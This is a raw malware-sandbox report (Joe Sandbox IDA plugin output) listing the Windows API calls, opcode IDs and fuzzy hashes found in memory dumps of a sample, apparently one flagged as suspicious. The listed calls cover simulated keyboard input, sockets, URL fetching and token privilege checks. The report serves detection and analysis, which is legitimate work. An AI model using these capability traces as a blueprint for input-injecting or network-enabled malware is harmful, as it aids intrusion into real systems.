                              • CoInitialize.OLE32(00000000), ref: 008F83D8
                              • CoUninitialize.OLE32 ref: 008F83E3
                                • Part of subcall function 008DDA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 008DDAC5
                              • VariantInit.OLEAUT32(?), ref: 008F83EE
                              • VariantClear.OLEAUT32(?), ref: 008F86BF
                              Similarity
                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                              APIs
                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00912C7C,?), ref: 008D7C32
                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00912C7C,?), ref: 008D7C4A
                              • CLSIDFromProgID.OLE32(?,?,00000000,0090FB80,000000FF,?,00000000,00000800,00000000,?,00912C7C,?), ref: 008D7C6F
                              • _memcmp.LIBCMT ref: 008D7C90
                              Similarity
                              • API ID: FromProg$FreeTask_memcmp
                              Similarity
                              • API ID: Variant$AllocClearCopyInitString
                              APIs
                              • GetWindowRect.USER32(0116DF68,?), ref: 00909AD2
                              • ScreenToClient.USER32(00000002,00000002), ref: 00909B05
                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00909B72
                              Similarity
                              • API ID: Window$ClientMoveRectScreen
                              APIs
                              • socket.WSOCK32(00000002,00000002,00000011), ref: 008F6CE4
                              • WSAGetLastError.WSOCK32(00000000), ref: 008F6CF4
                                • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 008F6D58
                              • WSAGetLastError.WSOCK32(00000000), ref: 008F6D64
                              Similarity
                              • API ID: ErrorLast$__itow__swprintfsocket
                              APIs
                              • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0090F910), ref: 008F67BA
                              • _strlen.LIBCMT ref: 008F67EC
                              Similarity
                              • API ID: _strlen
                              APIs
                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 008EBB09
                              • GetLastError.KERNEL32(?,00000000), ref: 008EBB2F
                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 008EBB54
                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 008EBB80
                              Similarity
                              • API ID: CreateHardLink$DeleteErrorFileLast
                              APIs
                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00908B4D
                              Similarity
                              • API ID: InvalidateRect
                              • String ID:
                              • API String ID: 634782764-0
                              • Opcode ID: cbd04df267877613ee6c092af6c72fd644246147fd8b1204807e28589a2b1cc4
                              • Instruction ID: 161aa11d557fb4c0e04ff42c2cf03dcc65c46c39e9b17a3530e896a19f5d8ee7
                              • Opcode Fuzzy Hash: cbd04df267877613ee6c092af6c72fd644246147fd8b1204807e28589a2b1cc4
                              • Instruction Fuzzy Hash: FF31B2B4704208BEEB209E58CC55FAB3BA8EB06320F244912FAD1D66E1DE35A9809751
                              APIs
                              • ClientToScreen.USER32(?,?), ref: 0090AE1A
                              • GetWindowRect.USER32(?,?), ref: 0090AE90
                              • PtInRect.USER32(?,?,0090C304), ref: 0090AEA0
                              • MessageBeep.USER32(00000000), ref: 0090AF11
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Rect$BeepClientMessageScreenWindow
                              • String ID:
                              • API String ID: 1352109105-0
                              • Opcode ID: 555572d0bb694ef8e5d53c52b8b13626eaf57a585240810f2e8120c277fac674
                              • Instruction ID: 98d6ed2f581c7f0713b02b92f5f885efde66ed98d800e8eea619eeaafc0747e3
                              • Opcode Fuzzy Hash: 555572d0bb694ef8e5d53c52b8b13626eaf57a585240810f2e8120c277fac674
                              • Instruction Fuzzy Hash: 5F416C7460431ADFCB11CF58C884FA9BBF9FB8A350F2481A9E9149B391D731A941DF92
                              APIs
                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 008E1037
                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 008E1053
                              • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 008E10B9
                              • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 008E110B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: KeyboardState$InputMessagePostSend
                              • String ID:
                              • API String ID: 432972143-0
                              • Opcode ID: d75716ae868f29365904cb7e0b5631603db80f166f8d36bce4f7fd1ae18063d0
                              • Instruction ID: 75c8f80727f65f1e7e34a2d98de4870d78c41836816b7ba4ee1f69d3f74e359a
                              • Opcode Fuzzy Hash: d75716ae868f29365904cb7e0b5631603db80f166f8d36bce4f7fd1ae18063d0
                              • Instruction Fuzzy Hash: 3D313930E44AC8AEFF308A6B8C0DBF9BBA9FB46314F04421AF591D25D1C77589C49752
                              APIs
                              • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 008E1176
                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 008E1192
                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 008E11F1
                              • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 008E1243
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: KeyboardState$InputMessagePostSend
                              • String ID:
                              • API String ID: 432972143-0
                              • Opcode ID: e5336545d739ad8e1248e93a984661a5b2aa7bfa5d02c9cc53f0a26c4cd29e50
                              • Instruction ID: a2ca438e41220570089a4e85a056552b6a92a9a844d6f63d879e2ba883f462b9
                              • Opcode Fuzzy Hash: e5336545d739ad8e1248e93a984661a5b2aa7bfa5d02c9cc53f0a26c4cd29e50
                              • Instruction Fuzzy Hash: 23314630A4428CAEEF30CA6B8C0C7FABBAAFB4A310F04531BF281D21D1C3744A849751
                              APIs
                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 008B644B
                              • __isleadbyte_l.LIBCMT ref: 008B6479
                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 008B64A7
                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 008B64DD
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                              • String ID:
                              • API String ID: 3058430110-0
                              • Opcode ID: c4840d1bc78d81c28a62f29abd9adbe8d711ff94fe7b1b9a34f9e27a1310ebb8
                              • Instruction ID: c85f22d8505feda288e1d4d6b5d7e97d330e898232b0d6683a31c9425dc23b5e
                              • Opcode Fuzzy Hash: c4840d1bc78d81c28a62f29abd9adbe8d711ff94fe7b1b9a34f9e27a1310ebb8
                              • Instruction Fuzzy Hash: DD31E131600A4AEFDB218F64C844BFA7BA5FF41310F154429F864C72A0FB39D860DB94
                              APIs
                              • GetForegroundWindow.USER32 ref: 00905189
                                • Part of subcall function 008E387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 008E3897
                                • Part of subcall function 008E387D: GetCurrentThreadId.KERNEL32 ref: 008E389E
                                • Part of subcall function 008E387D: AttachThreadInput.USER32(00000000,?,008E52A7), ref: 008E38A5
                              • GetCaretPos.USER32(?), ref: 0090519A
                              • ClientToScreen.USER32(00000000,?), ref: 009051D5
                              • GetForegroundWindow.USER32 ref: 009051DB
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                              • String ID:
                              • API String ID: 2759813231-0
                              • Opcode ID: dfabd2ce9797d4e4dd917f2fc15665d78ad6af0e0359be731172243d87efc743
                              • Instruction ID: c5f217f372427994a0c9aac5a9d78d2a7c7f7cb039466993d47631b7383e6b65
                              • Opcode Fuzzy Hash: dfabd2ce9797d4e4dd917f2fc15665d78ad6af0e0359be731172243d87efc743
                              • Instruction Fuzzy Hash: DA312C71900118AFDB14EFA9C885DEFB7F9FF98300F14406AE856E7241EA759E05CBA1
                              APIs
                                • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                              • GetCursorPos.USER32(?), ref: 0090C7C2
                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,008BBBFB,?,?,?,?,?), ref: 0090C7D7
                              • GetCursorPos.USER32(?), ref: 0090C824
                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,008BBBFB,?,?,?), ref: 0090C85E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                              • String ID:
                              • API String ID: 2864067406-0
                              • Opcode ID: cdfd7b434c3e1914768720d698f6f3d153ce3a97faf7588c591b073a8e033648
                              • Instruction ID: b22ce8627c4a416aca894e493d5f774d3a599564d6a03dd1fb409bf7a282b5b9
                              • Opcode Fuzzy Hash: cdfd7b434c3e1914768720d698f6f3d153ce3a97faf7588c591b073a8e033648
                              • Instruction Fuzzy Hash: 7E317175600118BFCB25CF58CC98EEA7BBAEF4A710F048169F9058B2A1D7319D50EB65
                              APIs
                                • Part of subcall function 008D8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 008D8669
                                • Part of subcall function 008D8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 008D8673
                                • Part of subcall function 008D8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008D8682
                                • Part of subcall function 008D8652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 008D8689
                                • Part of subcall function 008D8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008D869F
                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008D8BEB
                              • _memcmp.LIBCMT ref: 008D8C0E
                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008D8C44
                              • HeapFree.KERNEL32(00000000), ref: 008D8C4B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                              • String ID:
                              • API String ID: 1592001646-0
                              • Opcode ID: e219040d0a797f6b3d04f361141fabf8e8f92a1b59b61aecdd08d752cd560c30
                              • Instruction ID: 70534f6a569ab1ac1131e955a27f8b21cd8c269dc11c45aede5afdd722363a5b
                              • Opcode Fuzzy Hash: e219040d0a797f6b3d04f361141fabf8e8f92a1b59b61aecdd08d752cd560c30
                              • Instruction Fuzzy Hash: 6E217A71E11208EFDB10DFA4C949BEEB7B8FF44354F14419AE554E7240EB31AA46DB60
                              APIs
                              • __setmode.LIBCMT ref: 008A0BF2
                                • Part of subcall function 00885B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,008E7B20,?,?,00000000), ref: 00885B8C
                                • Part of subcall function 00885B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,008E7B20,?,?,00000000,?,?), ref: 00885BB0
                              • _fprintf.LIBCMT ref: 008A0C29
                              • OutputDebugStringW.KERNEL32(?), ref: 008D6331
                                • Part of subcall function 008A4CDA: _flsall.LIBCMT ref: 008A4CF3
                              • __setmode.LIBCMT ref: 008A0C5E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                              • String ID:
                              • API String ID: 521402451-0
                              • Opcode ID: 5845712218e182f203de9a38420b0205366fb45af7d229e8177eaedbf14787ea
                              • Instruction ID: c12aeb22a6cc1338f43fc80373da2a28f0d81c60ef5cd1e356817924878b0c3b
                              • Opcode Fuzzy Hash: 5845712218e182f203de9a38420b0205366fb45af7d229e8177eaedbf14787ea
                              • Instruction Fuzzy Hash: 991105319042087FEB04B7BC9C429BE7B69FF82320F14011AF205D7692DEA15D525793
                              APIs
                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008F1A97
                                • Part of subcall function 008F1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 008F1B40
                                • Part of subcall function 008F1B21: InternetCloseHandle.WININET(00000000), ref: 008F1BDD
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Internet$CloseConnectHandleOpen
                              • String ID:
                              • API String ID: 1463438336-0
                              • Opcode ID: 6702278a1054cee3af06f88986660fea9abf71debde11260e9a62640004e4bb2
                              • Instruction ID: ca79a5d18ae81746b48762dda67a7a6e581c110a61f923f9a1d80fd760333ab8
                              • Opcode Fuzzy Hash: 6702278a1054cee3af06f88986660fea9abf71debde11260e9a62640004e4bb2
                              • Instruction Fuzzy Hash: C1219F35204609FFDB229F748C09FBAB7A9FF88711F10001AFB11E6651EB719911ABA1
                              APIs
                                • Part of subcall function 008DF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,008DE1C4,?,?,?,008DEFB7,00000000,000000EF,00000119,?,?), ref: 008DF5BC
                                • Part of subcall function 008DF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 008DF5E2
                                • Part of subcall function 008DF5AD: lstrcmpiW.KERNEL32(00000000,?,008DE1C4,?,?,?,008DEFB7,00000000,000000EF,00000119,?,?), ref: 008DF613
                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,008DEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 008DE1DD
                              • lstrcpyW.KERNEL32(00000000,?), ref: 008DE203
                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,008DEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 008DE237
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: lstrcmpilstrcpylstrlen
                              • String ID: cdecl
                              • API String ID: 4031866154-3896280584
                              • Opcode ID: fb08823b5110c37ad347da4d5c1360f70adbcecc5e9fe2f2581e294008987477
                              • Instruction ID: 9fa40c9264cad39540348ce82192fa52ec510544e985854517dba38c5c813325
                              • Opcode Fuzzy Hash: fb08823b5110c37ad347da4d5c1360f70adbcecc5e9fe2f2581e294008987477
                              • Instruction Fuzzy Hash: C211BE36204305EFCB25AF68DC45A7A77B9FF85350B40422BF816CB2A0EB71A95097A1
                              APIs
                              • _free.LIBCMT ref: 008B5351
                                • Part of subcall function 008A594C: __FF_MSGBANNER.LIBCMT ref: 008A5963
                                • Part of subcall function 008A594C: __NMSG_WRITE.LIBCMT ref: 008A596A
                                • Part of subcall function 008A594C: RtlAllocateHeap.NTDLL(01150000,00000000,00000001,00000000,?,?,?,008A1013,?), ref: 008A598F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: AllocateHeap_free
                              • String ID:
                              • API String ID: 614378929-0
                              • Opcode ID: 2c918ee8c5caac0e7366385b2455afb3325a6dcb0603df7a4ef1d6a001a9413b
                              • Instruction ID: 13218e2f43c44f77920037b5f8315c31ae2303cb6df1a35ccaa654e44aad8444
                              • Opcode Fuzzy Hash: 2c918ee8c5caac0e7366385b2455afb3325a6dcb0603df7a4ef1d6a001a9413b
                              • Instruction Fuzzy Hash: 1D11C432908A15AEDB312F78AC1579E37D4FF1B3E0B200429F904DA791DFB589409751
                              APIs
                              • _memset.LIBCMT ref: 00884560
                                • Part of subcall function 0088410D: _memset.LIBCMT ref: 0088418D
                                • Part of subcall function 0088410D: _wcscpy.LIBCMT ref: 008841E1
                                • Part of subcall function 0088410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008841F1
                              • KillTimer.USER32(?,00000001,?,?), ref: 008845B5
                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008845C4
                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008BD6CE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                              • String ID:
                              • API String ID: 1378193009-0
                              • Opcode ID: 9ad27caf57b7175329e6278930f6f66d2dac226e16b368de7019a3f7b2a2ca4d
                              • Instruction ID: 753288b485e1969ab48e02703aa7aa0eb940c9a4b3986d82e769273260e858ee
                              • Opcode Fuzzy Hash: 9ad27caf57b7175329e6278930f6f66d2dac226e16b368de7019a3f7b2a2ca4d
                              • Instruction Fuzzy Hash: 3B21DD71908744AFE7329B24DC55BEBBBECFF12308F04009EE69DD6241D7745A849B51
                              APIs
                                • Part of subcall function 00885B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,008E7B20,?,?,00000000), ref: 00885B8C
                                • Part of subcall function 00885B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,008E7B20,?,?,00000000,?,?), ref: 00885BB0
                              • gethostbyname.WSOCK32(?,?,?), ref: 008F66AC
                              • WSAGetLastError.WSOCK32(00000000), ref: 008F66B7
                              • _memmove.LIBCMT ref: 008F66E4
                              • inet_ntoa.WSOCK32(?), ref: 008F66EF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                              • String ID:
                              • API String ID: 1504782959-0
                              • Opcode ID: ef5feed27e5db69dde27eb12f0f90b1188f9df0020646f306a367ff6cbd7ba78
                              • Instruction ID: 20d9541b82e1112d87580fe04881e803ab76f7458821861d6c662dd95d4e9450
                              • Opcode Fuzzy Hash: ef5feed27e5db69dde27eb12f0f90b1188f9df0020646f306a367ff6cbd7ba78
                              • Instruction Fuzzy Hash: F3114936500508AFCB04FBA8DD96DEEB7B8FF14310B148165F502E72A1EB30AE14DB62
                              APIs
                              • SendMessageW.USER32(?,000000B0,?,?), ref: 008D9043
                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008D9055
                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008D906B
                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008D9086
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID:
                              • API String ID: 3850602802-0
                              • Opcode ID: 646dd5eaf05a82f6708a3fe4d62c5126d2db155acd658b03c0d68e22b8368c09
                              • Instruction ID: eba7ee8db19391cf4284538f46b8bbbc3c41f8d7b3e27ec5ec85c3b99ef84c98
                              • Opcode Fuzzy Hash: 646dd5eaf05a82f6708a3fe4d62c5126d2db155acd658b03c0d68e22b8368c09
                              • Instruction Fuzzy Hash: C4115E79900218FFDB10DFA5CC84E9DBBB4FB48310F204196E904B7250D6726E11DB90
                              APIs
                                • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                              • DefDlgProcW.USER32(?,00000020,?), ref: 008812D8
                              • GetClientRect.USER32(?,?), ref: 008BB84B
                              • GetCursorPos.USER32(?), ref: 008BB855
                              • ScreenToClient.USER32(?,?), ref: 008BB860
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Client$CursorLongProcRectScreenWindow
                              • String ID:
                              • API String ID: 4127811313-0
